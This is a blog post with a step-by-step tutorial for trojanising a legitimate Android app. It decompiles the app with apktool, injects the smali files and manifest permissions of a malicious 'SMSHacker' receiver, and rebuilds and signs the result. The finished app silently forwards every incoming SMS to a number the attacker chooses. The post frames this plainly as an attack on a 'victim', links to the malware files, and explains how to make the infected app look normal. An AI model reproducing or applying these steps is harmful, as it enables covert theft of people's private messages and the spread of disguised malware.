Notice

Thursday, September 5, 2013

Android Malware Injection into Original Apps in Ubuntu


This is a post I have posted in my other blog Insider Attack.

In this post I am going to describe how malicious apps can be injected into an original apps using UBUNTU. For this post I have created a small malicious app which intercepts incoming SMS and fowards to another person without victim  knowing when message receives. You need to have following files to do this:

  • APKtool (for WIndows, you may need to download a windows version of apktool here)
  • SignAPK.jar + keys
  • Malicious SMSHacker.apk app
You can download all these stuff with this link;

Here is a rough sketch of our process to do this..
  1. Decompile the original android app (.apk) using apktool
  2. Decompile the malicious android app (SMSHacker.apk) using apktool
  3. Inject decompiled malicious app's files(Copy malicious files into) into decompiled original app
  4. Inject permissions in the malicious apk file's AndroidManifest.xml into original file's AndroidManifest.xml
  5. Recompile the infected original app using apktool
  6. Sign the recompiled app using signapk.jar
  7. Install recompiled-signed apk file into victim's device
Let's follow the listed steps;

Step 1:

    Download all files I have given in the above mediafire link. I have included all required files including sample SMSHacker app to test. And copy all files into a single directory.

Copy your apk file into which you need to inject SMSHacker into the same directory. You can keep your apk file in your own directory, but you need to mention the path to it explicitly in the following step.

Open a terminal and go to that directory. Run following command to decompile your original apk file(Android App). Lets say your original apk filename is myapp.apk;

./apktool d myapp.apk MyAppDec

In this above command 'd' switch means you are decompiling myapp.apk file. With 'MyAppDec', you mention include decompiled app in a directory named 'MyAppDec' in the same folder.

Step 2:

Now decompile your malicious file too (SMSHacker.apk);

./apktool d SMSHacker.apk SMSHackerDec

Then you'll see two directories called SMSHackerDec and MyAppDec in the same folder in which decompiled files are included.

Step 3:

If you browse into these folders, you'll note that there is a folder called smali in both the decompiled app folders. This smali folder includes all decompiled files from the apks. When you decompile an apk, they are decompiled into a file type called .smali. Now go into the folder which include all smali files of the malware (SMSHacker) with this command.

cd /SMSHackerDec/smali/com/sms/smshacker/

Then open SMSHacker.smali file in gedit.

gedit SMSHacker.smali

I created this malware and tested on emulators. So I have set the sms fowarding mobile number as '5554'. You can change it to your own one and let all receiving messages of victim be fowarded to your own number. So search for the string '5554' in the SMSHacker.smali file and replace it with your preferred number. (say your backup phone :D).

Now copy these malicious files into decompiled original app's files.

cd ../../../../../
cp SMSHackerDec/smali/com/* -R MyAppDec/smali/com/

Then you have injected files into the original folder. Now we need to inject required permissions from the SMSHacker's AndroidManifest.xml file into the original file's AndroidManifest.xml file.

Step 4:

Open SMSHacker's AndroidManifest.xml file in gedit.

gedit SMSHackerDec/AndroidManifest.xml

You'll see three lines in the file like these.


    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />

Actually we do not need the 3rd permission for this sake. So copy first two lines into the MyAppDec/AndroidManifest.xml file before <application> tag.

And also you might see few lines like followings inside the malicious file's AndroidManifest.xml

<receiver android:name="com.sms.smshacker.SMSHacker">
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
 </receiver>

Copy this part into MyAppDec/AndroidManifest.xml within <application> tag and before  first <activity> tag.

Now save  MyAppDec/AndroidManifest.xml file and close gedit.

Now we have succesfully injected files and permissions. Now we can recompile the new app using apktool.

Step 5:

Go to the directory where apktool and other files exist and run apktool to recompile the app.

./apktool b -f MyAppDec myhackedapp.apk

This 'b' switch means build and '-f' switch means 'force'. This '-f' neglects any file changes in the apk file and compile it without any issues.

After running that command you'll see a new myhackedapp.apk file inside the same folder.

Step 6:

We need to sign that app using signapk.jar before installation. This signing task is important before installation since you cannot install an app on a device or an emulator without signing it.

Sign your apk file using following command.

java -jar signapk.jar testkey.x509.pem testkey.pk8 myhackedapp.apk myhackedapp-signed.apk

You'll see your signed apk file named myhackedapp-signed.apk.

Now we are done. We can install this apk file in any device and let victim execute the malicious code.

This SMSHacker.apk is actually an app with a Broadcast receiver. What it does is, when a message is received it gets invoked and executes the code inside its handler. I have included code to foward message to another phone inside the handler. We need to include <receiver> information inside the AndroidManifest.xml file to get this to work. That's why we injected <receiver> information from the malicious manifest file into the original manifest file. And also we require permissions to read an incoming messge and send a sms. So we injected permissions to read sms and send sms in original app's manifest. 

When installed, this would be visible as a normal app in victims device, and when victim runs the app for the first time receiver starts. After that if victim closes the original app the receiver continues listening for incoming sms.

     
I have included this in a module in the Android Exploitation Framework I am currently developing for a project. In that framework, one can use many types of payloads to inject to any original app.

Thanks for reading and if there are any issues, post a comment below.

No comments:

Post a Comment